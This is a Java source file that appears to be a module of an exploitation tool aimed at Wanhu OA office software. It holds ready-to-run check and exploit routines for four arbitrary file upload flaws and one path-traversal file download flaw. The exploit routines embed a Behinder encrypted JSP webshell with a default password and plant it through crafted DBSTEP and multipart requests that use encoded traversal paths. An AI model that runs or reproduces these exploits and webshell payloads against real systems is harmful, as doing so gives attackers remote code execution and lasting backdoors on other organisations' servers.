package com.achuna33.Controllers;

import com.achuna33.SupportType.Poc_Exp;
import com.achuna33.SupportType.SupportVul;
import com.achuna33.Utils.Cache;
import com.achuna33.Utils.HttpRequest;
import com.achuna33.Utils.Response;
import com.achuna33.Utils.Utils;

import java.io.FileInputStream;
import java.net.MalformedURLException;
import java.nio.charset.StandardCharsets;
import java.util.Base64;

@BasicMapping(uri = "万户")
public class WanhuController extends Controller implements BasicController{
    public WanhuController(){

    }
    //base64加解密
    final static Base64.Encoder encoder = Base64.getEncoder();
    final static Base64.Decoder decoder = Base64.getDecoder();
    public static String encode(String text) {
        return encoder.encodeToString(text.getBytes(StandardCharsets.UTF_8));
    }

    public static String decode(String encodedText) {
        return new String(decoder.decode(encodedText), StandardCharsets.UTF_8);
    }

    @VulnerabilityDescriptionMapping(Description = "万户_OA_金格组件任意文件上传漏洞_officeserverservlet",SupportVulType = SupportVul.UploadFile)
    public void vul_jingeUpload(Poc_Exp type, String target,Object... args) throws MalformedURLException {
        Cache.uiController.logTextArea.appendText("\n开始检测：  vul_jingeUpload");
        switch (type){
            case EXP:
                String path = null;
                String mypayload = null;
                try {
                    path = (String) args[0];
                    try {
                        byte[] bytes = Utils.readFile(path);
                        mypayload = new String(bytes);
                    }catch (Exception e){
                        WriteExpLog("\n [*] 文件读取失败");

                    }
                }catch (Exception e){

                }
                String payload = "11111111111111111111111111111111<%@page import=\"java.util.*,java.io.*,javax.crypto.*,javax.crypto.spec.*\" %>\n" +
                        "<%!\n" +
                        "private byte[] Decrypt(byte[] data) throws Exception\n" +
                        "{\n" +
                        "    String key=\"e45e329feb5d925b\";\n" +
                        "\tfor (int i = 0; i < data.length; i++) {\n" +
                        "\t\tdata[i] = (byte) ((data[i]) ^ (key.getBytes()[i + 1 & 15]));\n" +
                        "\t}\n" +
                        "\treturn data;\n" +
                        "}\n" +
                        "%>\n" +
                        "    <%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return\n" +
                        "        super.defineClass(b,0,b.length);}}%>\n" +
                        "        <%if (request.getMethod().equals(\"POST\")){\n" +
                        "            ByteArrayOutputStream bos = new ByteArrayOutputStream();\n" +
                        "            byte[] buf = new byte[512];\n" +
                        "            int length=request.getInputStream().read(buf);\n" +
                        "            while (length>0)\n" +
                        "            {\n" +
                        "                byte[] data= Arrays.copyOfRange(buf,0,length);\n" +
                        "                bos.write(data);\n" +
                        "                length=request.getInputStream().read(buf);\n" +
                        "            }\n" +
                        "        new U(this.getClass().getClassLoader()).g(Decrypt(bos.toByteArray())).newInstance().equals(pageContext);}\n" +
                        "    %>\n";

                if (mypayload!=null){
                    payload = mypayload;
                }else {
                    WriteExpLog("\n [*] 默认shell 为冰蝎shell 密码 rebeyond");
                }
                String url = "/defaultroot/officeserverservlet";
                HttpRequest httpRequest1 = new HttpRequest(target+url);
                String data1 = "DBSTEP V3.0     141             0               5860            DBSTEP=REJTVEVQ\r\n" +
                        "OPTION=U0FWRUZJTEU=\r\n" +
                        "RECORDID=\r\n" +
                        "isDoc=dHJ1ZQ==\r\n" +
                        "moduleType=Z292ZG9jdW1lbnQ=\r\n"+
                        "FILETYPE=Li4vLi4vdXBncmFkZS8yLmpzcA==\r\n"+
                        payload+"\r\n";
                httpRequest1.addHeaders("Content-type"," ");
                Response response1 = httpRequest1.Post(data1);
                HttpRequest exphttpRequest2 = new HttpRequest(target+"/defaultroot/upgrade/2.jsp");
                String data2 = "";
                Response response2 = exphttpRequest2.Get(data2);
                if (response2.statusCode==200){
                    WriteExpLog("\n"+response1.responseBody);
                    String shellpath = target+"/defaultroot/upgrade/2.jsp";
                    WriteExpLog("\n[*] shellpath :"+shellpath);
                }
                break;
            case POC:
                HttpRequest pochttpRequest = new HttpRequest(target+"/defaultroot/officeserverservlet");
                String pocshellcode = "DBSTEP V3.0     141             0               1860            DBSTEP=REJTVEVQ\r\n" +
                        "OPTION=U0FWRUZJTEU=\r\n" +
                        "RECORDID=\r\n" +
                        "isDoc=dHJ1ZQ==\r\n" +
                        "moduleType=Z292ZG9jdW1lbnQ=\r\n"+
                        "FILETYPE=Li4vLi4vdXBncmFkZS8yLnR4dA==\r\n"+
                        "1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n";
                //  String data = decode(pocshellcode.replace("\n","\r\n"));
                pochttpRequest.addHeaders("User-Agent","Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko");
                pochttpRequest.addHeaders("Accept-Encoding","gzip, deflate");
                pochttpRequest.addHeaders("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9");
                pochttpRequest.addHeaders("Accept-Language"," zh-CN,zh;q=0.9");
                pochttpRequest.addHeaders("Content-type"," ");
                pochttpRequest.Post(pocshellcode);
                HttpRequest httpRequest2 =  new HttpRequest(target+"/defaultroot/upgrade/2.txt");
                String data3 = "";
                Response result =httpRequest2.Get(data3);
                if(result.responseBody.contains("111111111111111111111") && result.statusCode==200){
                    WriteLog(" 存在漏洞");
                }else {
                    WriteLog(" 不存在漏洞");
                }
                //WriteLog("\n"+result.responseBody);
        }
    }
@VulnerabilityDescriptionMapping(Description = "万户OA smartUpload.jsp 任意文件上传漏洞",SupportVulType = SupportVul.UploadFile)
    public void vul_smartUpload(Poc_Exp type, String target,Object... args) throws MalformedURLException {
    WriteLog("\n[*]开始检测：  万户OA smartUpload.jsp 任意文件上传漏洞");
    switch (type){
        case EXP:
            String path = null;
            String mypayload = null;
            try {
                path = (String) args[0];
                try {
                    byte[] bytes = Utils.readFile(path);
                    mypayload = new String(bytes);
                }catch (Exception e){
                    WriteExpLog("\n [*] 文件读取失败");
                }
            }catch (Exception e){

            }
            String payload = "<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals(\"POST\")){String k=\"e45e329feb5d925b\";/*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/session.putValue(\"u\",k);Cipher c=Cipher.getInstance(\"AES\");c.init(2,new SecretKeySpec(k.getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>\n";

            if (mypayload!=null){
                payload = mypayload;
            }else {
                WriteExpLog("\n [*] 默认shell 为冰蝎shell 密码 rebeyond");
            }
            String url = "/defaultroot/extension/smartUpload.jsp?path=information&mode=add&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jsp,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0";
            HttpRequest httpRequest1 = new HttpRequest(target+url);
            httpRequest1.addHeaders("Content-Type","multipart/form-data; boundary=----WebKitFormBoundarynNQ8hoU56tfSwBVU");
            String data1 = "-----------------------------8993010833740027670183720397\r\n" +
                    "Content-Disposition: form-data; name=\"photo\"; filename=\"shell.jsp\"\r\n" +
                    "Content-Type: application/octet-stream\r\n" +
                    "\r\n" +
                    payload+"\r\n" +
                    "-----------------------------8993010833740027670183720397\r\n" +
                    "Content-Disposition: form-data; name=\"continueUpload\"\r\n" +
                    "\r\n" +
                    "1\r\n" +
                    "-----------------------------8993010833740027670183720397\r\n" +
                    "Content-Disposition: form-data; name=\"submit\"\r\n" +
                    "\r\n" +
                    "上传继续\r\n" +
                    "-----------------------------8993010833740027670183720397--\r\n";
            Response response1 = httpRequest1.Post(data1);
            if (response1.statusCode==200){
                WriteExpLog("\n"+response1.responseBody);
                String[] split = response1.responseBody.split("=\";\"");
                String shellpath = split[1].split("\";\"")[0];
                WriteExpLog("\n[*] shellpath :"+shellpath);
            }
            break;
        case POC:
            HttpRequest httpRequest = new HttpRequest(target+"/defaultroot/extension/smartUpload.jsp?path=information&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jsp,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0");
            String data = "";
            Response result = httpRequest.Get(data);
            if(result.responseBody.contains("continueUpload") && result.statusCode==200){
                WriteLog(" 存在漏洞");
            }else {
                WriteLog(" 不存在漏洞");
            }
            WriteLog("\n"+result.responseBody);
    }
}

@VulnerabilityDescriptionMapping(Description = "万户OA fileUpload.controller 任意文件上传漏洞",SupportVulType = SupportVul.UploadFile)
    public void vul_fileUpload(Poc_Exp type, String target,Object... args) throws MalformedURLException {
    WriteLog("\n[*]开始检测：  万户OA fileUpload.controller 任意文件上传漏洞");
    switch (type){
        case EXP:
            String path = null;
            String mypayload = null;
            try {
                path = (String) args[0];
                try {
                    byte[] bytes = Utils.readFile(path);
                    mypayload = new String(bytes);
                }catch (Exception e){
                    WriteExpLog("\n [*] 文件读取失败");
                }
            }catch (Exception e){

            }
            String payload = "<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals(\"POST\")){String k=\"e45e329feb5d925b\";/*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/session.putValue(\"u\",k);Cipher c=Cipher.getInstance(\"AES\");c.init(2,new SecretKeySpec(k.getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>\n";

            if (mypayload!=null){
                payload = mypayload;
            }else {
                WriteExpLog("\n [*] 默认shell 为冰蝎shell 密码 rebeyond");
            }
            HttpRequest httpRequest3 = new HttpRequest(target+"/defaultroot/upload/fileUpload.controller");
            String data1 = "--KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0\r\n" +
                    "Content-Disposition: form-data; name=\"file\"; filename=\"cmd.jsp\"\r\n" +
                    "Content-Type: application/octet-stream\r\n" +
                    "Content-Transfer-Encoding: binary\r\n" +
                    "\r\n" +
                    payload+"\r\n" +
                    "--KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0--\r\n";
            httpRequest3.addHeaders("Content-Type","multipart/form-data; boundary=KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0");
            httpRequest3.addHeaders("Connection","Keep-Alive");
            Response result1 = httpRequest3.Post(data1);
            if(result1.responseBody.contains("success") && result1.statusCode==200){
                WriteExpLog("\n[*] 存在漏洞\n"+result1.responseBody);
            }else {
                WriteExpLog("\n 不存在漏洞\n"+result1.responseBody);
            }

            break;
        case POC:
            HttpRequest httpRequest = new HttpRequest(target+"/defaultroot/upload/fileUpload.controller");
            String data = "--KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0\n" +
                    "Content-Disposition: form-data; name=\"file\"; filename=\"cmd.jsp\"\n" +
                    "Content-Type: application/octet-stream\n" +
                    "Content-Transfer-Encoding: binary\n" +
                    "\n" +
                    "<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals(\"POST\")){String k=\"e45e329feb5d925b\";/*......tas9er*/session.putValue(\"u\",k);Cipher c=Cipher.getInstance(\"AES\");c.init(2,new SecretKeySpec(k.getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>\n" +
                    "--KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0--";
            httpRequest.addHeaders("Content-Type","multipart/form-data; boundary=KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0");
            httpRequest.addHeaders("Connection","Keep-Alive");
            Response result = httpRequest.Post(data);
            if(result.responseBody.contains("success") && result.statusCode==200){
                WriteLog("\n 存在漏洞\n"+result.responseBody);
            }else {
                WriteLog("\n 不存在漏洞\n"+result.responseBody);
            }
    }
}

    @VulnerabilityDescriptionMapping(Description = "万户OA downloadhttp.jsp 任意文件下载漏洞",SupportVulType = SupportVul.信息泄露)
    public void vul_downloadhttp(Poc_Exp type, String target,Object... args) throws MalformedURLException {
        WriteLog("\n[*]开始检测：  万户OA downloadhttp.jsp 任意文件下载漏洞");
        String url = "/defaultroot/site/templatemanager/downloadhttp.jsp?fileName=../public/edit/jsp/config.jsp";
        switch (type){
            case EXP:
                break;
            case POC:
                HttpRequest httpRequest = new HttpRequest(target+url);

                Response result = httpRequest.Get("");
                if(result.statusCode==200){
                    WriteLog("\n[*] 访问地址："+target+url );
                    WriteLog("\n[*] 存在漏洞\n"+result.responseBody);
                }else {
                    WriteLog("\n[*] 不存在漏洞\n"+result.responseBody);
                }
        }
    }
    @VulnerabilityDescriptionMapping(Description = "万户_OA_OfficeServer",SupportVulType = SupportVul.UploadFile)
    public void vul_OfficeServer(Poc_Exp type, String target,Object... args) throws MalformedURLException {
        Cache.uiController.logTextArea.appendText("\n开始检测：  vul_OfficeServer");
        switch (type){
            case EXP:
                String path = null;
                String mypayload = null;
                try {
                    path = (String) args[0];
                    try {
                        byte[] bytes = Utils.readFile(path);
                        mypayload = new String(bytes);
                    }catch (Exception e){
                        WriteExpLog("\n [*] 文件读取失败");

                    }
                }catch (Exception e){

                }
                String payload = "11111111111111111111111111111111<%@page import=\"java.util.*,java.io.*,javax.crypto.*,javax.crypto.spec.*\" %>\n" +
                        "<%!\n" +
                        "private byte[] Decrypt(byte[] data) throws Exception\n" +
                        "{\n" +
                        "    String key=\"e45e329feb5d925b\";\n" +
                        "\tfor (int i = 0; i < data.length; i++) {\n" +
                        "\t\tdata[i] = (byte) ((data[i]) ^ (key.getBytes()[i + 1 & 15]));\n" +
                        "\t}\n" +
                        "\treturn data;\n" +
                        "}\n" +
                        "%>\n" +
                        "    <%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return\n" +
                        "        super.defineClass(b,0,b.length);}}%>\n" +
                        "        <%if (request.getMethod().equals(\"POST\")){\n" +
                        "            ByteArrayOutputStream bos = new ByteArrayOutputStream();\n" +
                        "            byte[] buf = new byte[512];\n" +
                        "            int length=request.getInputStream().read(buf);\n" +
                        "            while (length>0)\n" +
                        "            {\n" +
                        "                byte[] data= Arrays.copyOfRange(buf,0,length);\n" +
                        "                bos.write(data);\n" +
                        "                length=request.getInputStream().read(buf);\n" +
                        "            }\n" +
                        "        new U(this.getClass().getClassLoader()).g(Decrypt(bos.toByteArray())).newInstance().equals(pageContext);}\n" +
                        "    %>\n";

                if (mypayload!=null){
                    payload = mypayload;
                }else {
                    WriteExpLog("\n [*] 默认shell 为冰蝎shell 密码 rebeyond");
                }
                String url = "/defaultroot/public/iWebOfficeSign/OfficeServer.jsp";
                HttpRequest httpRequest1 = new HttpRequest(target+url);
                String data1 = "DBSTEP V3.0     177             0               611            DBSTEP=REJTVEVQ\n" +
                        "OPTION=U0FWRUZJTEU=\r\n" +
                        "RECORDID=\r\n" +
                        "firstFilesize=dHJ1ZQ==\r\n" +
                        "isDoc=dHJ1ZQ==\r\n"+
                        "moduleType=aW5mb3JtYXRpb24=\r\n"+
                        "FILETYPE=Ly4uLy4uL3B1YmxpYy9lZGl0L3gxLmpzcA==\r\n"+
                        "isViewOld=MQ==\r\n"+
                        payload+"\r\n";
                httpRequest1.addHeaders("Content-type"," ");
                Response response1 = httpRequest1.Post(data1);
                HttpRequest exphttpRequest2 = new HttpRequest(target+"/defaultroot/public/edit/x1.jsp");
                String data2 = "";
                Response response2 = exphttpRequest2.Get(data2);
                if (response2.statusCode==200){
                    WriteExpLog("\n"+response1.responseBody);
                    String shellpath = target+"/defaultroot/public/edit/x1.jsp";
                    WriteExpLog("\n[*] shellpath :"+shellpath);
                }
                break;
            case POC:
                HttpRequest pochttpRequest = new HttpRequest(target+"/defaultroot/public/iWebOfficeSign/OfficeServer.jsp");
                String pocshellcode = "DBSTEP V3.0     177             0               611            DBSTEP=REJTVEVQ\r\n" +
                        "OPTION=U0FWRUZJTEU=\r\n" +
                        "RECORDID=\r\n" +
                        "firstFilesize=dHJ1ZQ==\r\n" +
                        "isDoc=dHJ1ZQ==\r\n"+
                        "moduleType=aW5mb3JtYXRpb24=\r\n"+
                        "FILETYPE=Ly4uLy4uL3B1YmxpYy9lZGl0L3gxLnR4dA==\r\n"+
                        "isViewOld=MQ==\r\n"+
                        "1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n";
                //  String data = decode(pocshellcode.replace("\n","\r\n"));
                pochttpRequest.addHeaders("User-Agent","Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko");
                pochttpRequest.addHeaders("Accept-Encoding","gzip, deflate");
                pochttpRequest.addHeaders("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9");
                pochttpRequest.addHeaders("Accept-Language"," zh-CN,zh;q=0.9");
                pochttpRequest.addHeaders("Content-type"," ");
                pochttpRequest.Post(pocshellcode);
                HttpRequest httpRequest2 =  new HttpRequest(target+"/defaultroot/public/edit/x1.txt");
                String data3 = "";
                Response result =httpRequest2.Get(data3);
                if(result.responseBody.contains("111111111111111111111") && result.statusCode==200){
                    WriteLog(" 存在漏洞");
                }else {
                    WriteLog(" 不存在漏洞");
                }
                //WriteLog("\n"+result.responseBody);
        }
    }

}
